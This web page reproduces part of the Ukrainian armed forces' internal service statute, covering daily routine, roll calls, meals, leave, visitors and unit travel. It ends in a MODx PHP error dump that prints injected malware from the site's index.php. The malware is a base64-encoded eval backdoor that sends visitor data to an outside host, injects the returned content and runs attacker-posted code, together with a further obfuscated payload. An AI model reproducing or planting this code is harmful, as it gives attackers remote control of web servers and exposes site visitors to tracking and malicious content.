Обов’язки посадових осіб, рядових і матросів.

Український легіон » Дисципліни » Статут ЗСУ » Обов’язки посадових осіб, рядових і матросів.

Військовослужбовці Збройних Сил України, якими можуть бути лише громадяни України, мають права й свободи громадян України з урахуванням особливостей, що визначаються Конституцією України, законами України з військових питань, військовими статутами Збройних Сил України та іншими нормативно-правовими актами. На військовослужбовців покладаються обов'язки, що визначаються військовими статутами та порадниками Збройних Сил України.

Кожний військовослужбовець має військове звання відповідно до Закону України «Про загальний військовий обов'язок і військову службу». Військові звання поділяються на армійські та корабельні згідно з додатком 3 до цього Статуту.

Підйом, ранковий огляд і вечірня перевірка.

Уранці, за 10 хвилин до сигналу «Підйом», чер­говий роти піднімає заступників командирів взводів, а у встановлений час (за сигналом «Підйом») здійснює підйом роти.

Після підйому проводиться ранкова фізична зарядка, прибираються приміщення і територія, заправляється постіль, проводиться ранковий туалет та ранковий огляд.

Для ранкового огляду за командою чергового роти «Рота, для ранкового огляду—СТАВАЙ» заступ­ники командирів взводів (командири відділень) ши­кують свої підрозділи у визначеному місці, прикоман-дировані шикуються на лівому фланзі. Черговий роти доповідає старшині роти (одному із заступників коман­дирів взводів, який виконує обов'язки старшини роти) про готовність роти до огляду. За командою старшини роти заступники командирів взводів і командири відді­лень проводять ранковий огляд.

На ранкових оглядах перевіряється наявність особового складу, зовнішній вигляд і додержання пра­вил особистої гігієни.

Черговий роти вносить до книги запису хворих прі­звища військовослужбовців, які хочуть звернутися за медичною допомогою до медичного пункту частини. Прі­звища інших військовослужбовців, які звернулися за ме­дичною допомогою протягом дня, черговий роти також вносить до книги запису хворих (згідно з додатком 14 до цього Статуту).

Під час ранкового огляду командири відділень на­казують усунути виявлені недоліки, перевіряють вико­нання цих розпоряджень і доповідають про результати огляду заступникам командирів взводів, а заступники командирів взводів — старшині роти.

Стан ніг, шкарпеток (онуч) і натільної білизни пе­ревіряється періодично, як правило, перед сном.

У передбачений розпорядком дня час під керів­ництвом старшини роти (одного із заступників команди­рів взводів) проводиться вечірня прогулянка. Під час вечірньої прогулянки особовий склад виконує стройові пісні в складі підрозділів. Після прогулянки за коман­дою чергового роти «Рота, на вечірню перевірку — СТА­ВАЙ» заступники командирів взводів (командири відділень) шикують свої підрозділи на перевірку. Черговий роти доповідає старшині або особі, яка його заміщає, про готовність роти до вечірньої перевірки.

Старшина роти або особа, яка його заміщає, віддав­ши команду «Струнко», розпочинає вечірню перевірку, на початку якої називає прізвища військовослужбовців, зарахованих наказом Міністра оборони України до складу роти навічно. Заступник командира першого взводу, почувши прізвище військовослужбовця, допові­дає: «(Військове звання й прізвище) поліг як герой у бою за волю і незалежність Вітчизни».

Після цього старшина роти перевіряє особовий склад за іменним списком. Почувши своє прізвище, кожен від­повідає: «Я». За відсутніх відповідає командир відділен­ня (екіпажу, обслуги). Наприклад: «У відпустці», «У наряді».

Після перевірки особового складу старшина роти оголошує накази та розпорядження, які стосуються всіх військовослужбовців, наряди на наступний день і уточ­нює бойовий, пожежний розрахунки на випадок тривоги або пожежі. Після закінчення вечірньої перевірки стар­шина роти віддає команду «Вільно» і встановляє час для вечірнього туалету. У встановлений час подається сигнал «Відбій» і вмикається чергове освітлення. У при­міщенні встановлюється цілковита тиша.

Якщо на ранковому огляді чи вечірній перевірці присутній командир роти або один з офіцерів роти, стар­шина роти доповідає йому про результати огляду (пере­вірки).

Після ранкового огляду й вечірньої перевірки черго­ві рот доповідають черговому частини і подають відо­мості про відсутніх, а також військові звання, прізви­ща, імена та по батькові самовільно відсутніх.

Періодично за планом командира полку прово­дяться загальні батальйонні або полкові вечірні пере­вірки. Місце для проведення вечірньої перевірки має бути освітлене.

На загальних батальйонних (полкових) перевірках зобов'язаний бути присутнім весь особовий склад ба­тальйону (полку).

Перевірку всього особового складу за іменним спис­ком проводять командири рот і про результати перевір­ки доповідають командирові батальйону.

На загальній полковій перевірці командири баталь­йонів та окремих підрозділів полку доповідають про результати перевірки командирові полку.

Після закінчення загальної батальйонної (полкової) перевірки командир батальйону (полку) подає команду «Струнко» і наказує грати «Зорю». Загальна полкова вечірня перевірка закінчується виконанням оркестром Державного Гімну України. Потім підрозділи прохо­дять строєм під оркестр.

За відсутності в батальйоні (полку) оркестру використовуються технічні засоби від­творення звукозапису. З початком звучання «Зорі» командири підрозділів від взводу і вище прикладають руку до головного убору і опускають її за командою «Вільно», що подається командиром батальйону (пол­ку) після закінчення гри оркестру (звукозапису).

 

2. Навчальні заняття . Сніданок, обід і вечеря.

Бойова підготовка є основним елементом по­всякденної діяльності військовослужбовців у мирний час. Заходи, визначені планом бойової підготовки і роз­кладом занять, можуть переноситися тільки командиром (начальником), який їх затвердив.

На навчаннях і заняттях повинен бути присутнім весь особовий склад військової частини (підрозділу). Від занять звільняються особи, які перебувають у добо­вому наряді.

Для військовослужбовців строкової служби, звільне­них через хворобу, організовуються заняття в класі.

Командири (начальники), винні у відриві особового складу від занять з бойової підготовки, притягають­ся до дисциплінарної відповідальності.

Заняття розпочинаються і закінчуються за сиг­налом у час, визначений розпорядком дня.

Перед виходом на заняття командири відділень і за­ступники командирів взводів перевіряють наявність підлеглих і переконуються, чи додержано правил носін­ня одягу, чи правильно припасовано спорядження та чи розряджено зброю.

Після закінчення занять і навчань командири підроз­ділів перевіряють розрядженість зброї, наявність і комплектність усього озброєння, бойової та іншої тех­ніки, навчально-тренувальних засобів, а також наявність стрілецької зброї та боєприпасів. Результати-перевірки доповідаються за підпорядкованістю. Невикористані боєприпаси та гільзи здаються в установленому поряд­ку. Зброя чиститься, здійснюється технічне обслугову­вання озброєння, бойової та іншої техніки, а місцевість, де проводилися заняття, прибирається.

Приготування їжі має бути закінчено за ЗО хви­лин до встановленого розпорядком дня терміну її прий­мання. До початку роздавання їжі лікар (фельдшер) разом із черговим частини повинен перевірити її якість, здійс­нити контрольне зважування порцій, а також перевіри­ти санітарний стан приміщень їдальні, столово-кухонно­го посуду та інвентарю. Крім того, командиром військо­вої частини або за його вказівкою одним із його заступ­ників щоденно перевіряється якість приготування їжі.

Перевірку якості їжі та контрольне зважування пор­цій командир військової частини або його заступники здійснюють у залі-їдальні.

Записи про результати перевірки вносяться до книги обліку контролю за якістю приготування їжі.

У визначений розпорядком дня час черговий частини дає дозвіл на видачу якісної їжі.

Військовослужбовці строкової служби прихо­дять до їдальні у чистому взутті та одязі строєм під командою старшини роти або одного із заступників командирів взводів.

В їдальні забороняється приймати їжу в головному уборі, польовій утепленій куртці, спеціальному (робочо­му) одязі.

Військовослужбовці, які перебувають у добово­му наряді, харчуються у визначений командиром війсь­кової частини час. Хворим, які перебувають у медично­му пункті частини, їжа готується за нормами лікуваль­ного пайка і доставляється за розпорядженням началь­ника медичного пункту.

Для військовослужбовців, які потребують дієтичного харчування, їжа готується окремо.

 

3. Звільнення з розташування військової частини. Відвідування військовослужбовців.

Військовослужбовці строкової служби у вільний від занять та робіт час мають право вільно переміщати­ся по території військової частини, а під час звільнен­ня — і в межах гарнізону. Виїзд офіцерів, прапорщиків (мічманів), військовослужбовців, що проходять військо­ву службу за контрактом, за межі гарнізону здійснюєть­ся з дозволу командира військової частини. Виїзд військовослужбовців строкової служби за межі гарнізо­ну (за винятком випадків відбуття у відпустку або від­рядження) забороняється.

Військовослужбовці строкової служби, які не мають дисциплінарного стягнення у вигляді позбавлення права на чергове звільнення, користуються правом на звільнення з розташування військової частини. При цьому звільнення військовослужбовців здійснюється в такій черговості, щоб це не призводило до зниження рівня бойової готовності військової частини та якості бойового чергування.

Військовослужбовці строкової служби звільняються з розташування військової частини командиром роти у визначені командиром військової частини дні й години та у встановленому ним порядку. Одночасно з підрозді­лу може бути звільнено не більш як ЗО відсотків особо­вого складу. Військовослужбовці рядового складу пер­шого року служби одержують право на звільнення з роз­ташування військової частини після прийняття ними Військової присяги. У суботу та передсвяткові дні три­валість звільнення не може бути більшою за добу, в неділю і свята — до початку вечірньої перевірки. За дозволом командира батальйону командир роти може дати військовослужбовцю дозвіл на звільнення через поважну причину і в інші дні тижня після навчальних занять до відбою або до ранку наступного дня (але не пізніше ніж за 2 години до початку занять).

Дозвіл на звільнення дається почергово. Черговість звільнень  контролюється  заступниками  командирів взводів.

За дозволом на звільнення військовослужбовець ввертається до свого безпосереднього командира (на­чальника).

Наприклад: «Товаришу (пане) сержанте, прошу дати мені дозвіл на звільнення до 23-ї години».

Заступники командирів взводів подають старшині ро­ти для доповіді командирові роти підписані командиром взводу списки на звільнення військовослужбовців рядо­вого і сержантського складу строкової служби.

У визначений час черговий роти шикує військ ковослужбовців, які мають дозвіл на звільнення, і допо­відає старшині роти. Старшина роти перевіряє їх за списком, а також їх зовнішній вигляд, знання ними пра­вил поведінки у громадських місцях, наявність військо­вих квитків і видає їм записки про звільнення. Черговий роти вносить їх прізвища до книги обліку звільнених, складає список і представляє звільнених черговому час­тини (додатки 12 і 13 до цього Статуту).

Після повернення із звільнення військовослужбовці доповідають черговому роти про повернення, здають йому записки про звільнення і доповідають своєму безпосередньому командирові (начальникові).

Наприклад: «Товаришу (пане) сержанте, рядо­вий Сергієнко зі звільнення прибув, зауважень не мав (чи мав таке-то зауваження від такого-то)».

Якщо військовослужбовець повертається до підрозді­лу після відбою, він доповідає лише черговому роти.

Черговий роти зазначає у книзі обліку звільнених час повернення військовослужбовців зі звільнення, до­повідає черговому частини про повернення звільнених і здає записки про звільнення старшині роти.

Військовослужбовці, які проходять службу за контрактом, мають право перебувати поза розташуван­ням військової частини у вільний від служби час за умо­ви одночасної відсутності не більше ніж ЗО відсотків загальної кількості військовослужбовців певної кате­горії.

Курсанти 1—2 курсів звільняються із розташу­вання військово-навчального закладу у порядку, вста­новленому для військовослужбовців строкової служби. Курсанти старших курсів звільняються за рішенням командирів (начальників) військово-навчального закла­ду після закінчення навчальних занять і обов'язкових годин самостійної роботи, визначених розпорядком дня.

Відвідувати   військовослужбовців   строкової служби, а також тих, хто проходить службу за конт­рактом, дозволяється в час, визначений розпорядком дня, у спеціально відведеній для цього кімнаті .військо­вої частини.

Особи, які бажають відвідати військовослужбовців, допускаються в кімнату відвідувачів із дозволу черго­вого контрольно-пропускного пункту.

Члени сімей військовослужбовців та інші особи з дозволу командира військової частини можуть відві­дувати казарму, їдальню та інші приміщення,

для озна­йомлення з життям і побутом особового складу військо­вої частини. Для їх супроводу та надання необхідних пояснень призначається військовослужбовець. .

Відвідувачі із спиртними напоями чи в стані сп'яніння для відвідування військовослужбовців не до­пускаються. Прибулим не дозволяється ночувати в ка­зармах та в службових приміщеннях.

Прізвища відвідувачів вносяться черговим контроль­но-пропускного пункту до книги запису відвідувачів (додаток 15 до цього Статуту).

 

4. Відрядження, відправлення і прямування підрозділів (команд).

У службові відрядження підрозділи відправля­ються, як правило, на чолі з їх командирами. Якщо у відрядження відправляються військовослужбовці ря­дового і сержантського складу різних підрозділів, фор­мується команда, начальником якої призначається сержант, прапорщик або офіцер.

Командирові підрозділу (начальникові команди) у військовій частині видаються посвідчення про відряд­ження і список особового складу підрозділу (команди)' із зазначенням виду та номера зброї, кількості виданих боєприпасів, засвідчений гербовою печаткою військової частини й підписом начальника штабу частини. Коман­дирові підрозділу (начальникові команди), крім того, даються вказівки про:

порядок прямування та харчування в дорозі;

до якого часу, куди і в чиє розпорядження відбуває підрозділ (команда);

вимоги правил безпеки, правил зберігання і застосу­вання зброї,

Крім того, можуть бути дані й інші вказівки, пов'я­зані з виконанням відповідних завдань та несенням служби підрозділом (командою).

Підготовкою підрозділу (команди) для відправлення в службове відрядження керує командир того підрозді­лу, до складу якого входить цей підрозділ (команда).

У встановлений час підрозділ (команда) на чолі з призначеним командиром (начальником) прибуває до начальника штабу чи командира військової частини.

Начальник штабу чи командир військової частини перевіряє готовність підрозділу (команди), інструктує командира (начальника) підрозділу (команди), а у разі потреби й увесь особовий склад, забезпечує відправлен­ня підрозділу (команди), виділяючи транспортні засоби.

Командир підрозділу (начальник команди) від­повідає за підтримання особовим складом військової дисципліни та порядку, своєчасне виконання завдань, а також за збереження зброї, боєприпасів та іншого військового майна.

Прибувши до місця призначення, командир підрозді­лу (начальник команди) доповідає особі, в розпоряд­ження якої прибув підрозділ (команда), а після повер­нення — начальникові штабу чи командирові військової частини.

Під час пересування на автомобілях командир підрозділу (начальник команди) виконує обов'язки на­чальника колони (старшого машини).

Перевезення особового складу на необладнаних, а взимку — на відкритих автомобілях заборонено.

Під час пересування залізничним, морським, річко­вим і повітряним транспортом необхідно додержуватися вказівок, викладених у розділі 12 цього Статуту.

Військовослужбовці рядового і сержантського складу роти, які вирушають для виконання службових завдань, а також на екскурсії до громадських закладів у межах гарнізону, рухаються командою на чолі зі старшим, призначеним командиром роти з офіцерів, прапорщиків або сержантів.

Старший з офіцерів, прапорщиків збирає особовий склад команди, шикує його, оглядає, складає список і про готовність команди доповідає командирові роти чи особі, яка його заміщає, а по одержанні дозволу відво­дить команду до місця призначення.

Старший із сержантів, вишикувавши команду, веде її на огляд до старшини роти, одержує від нього запис­ку про звільнення на своє ім'я й список команди за під­писом командира роти. Загальна кількість військово­службовців разом із старшим зазначається у записці про звільнення. Потім старший веде команду до чергового частини.

Якщо з підрозділу відбуває двоє чи більше військовослужбовців, з їх числа завжди призначається старший. Команди у складі трьох і більше військово­службовців прямують до місця призначення строєм під командою старшого.

Для запобігання нещасним випадкам команди, які вирушають пішки, повинні мати вночі увімкнені сигналь­ні ліхтарі на початку й у кінці колони, а вдень — сиг­нальні прапорці.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0131 s(22 Requests)
  PHP: 0,4099 s 
  Total: 0,4231 s